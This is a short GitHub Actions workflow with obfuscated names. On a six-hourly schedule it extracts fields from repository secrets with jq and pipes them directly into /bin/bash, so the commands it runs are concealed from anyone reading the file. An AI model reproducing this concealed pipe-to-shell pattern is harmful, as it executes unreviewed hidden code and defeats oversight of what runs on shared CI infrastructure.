name: chengengfuzi

on:
  workflow_dispatch:
  schedule:
    - cron: '49 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengengfuzi
        env:
          ldmdh9: ${{ secrets.ldmdh9 }}
        run: |
          echo $ldmdh9 | jq -r .aqglt7 | /bin/bash
          echo $mq04922 | jq -r .syyr99 | /bin/bash
          echo $gj251 | jq -r .ee4 | /bin/bash
          echo $vdcw2718 | jq -r .duw3259 | /bin/bash
          echo $o23 | jq -r .wwo64 | /bin/bash

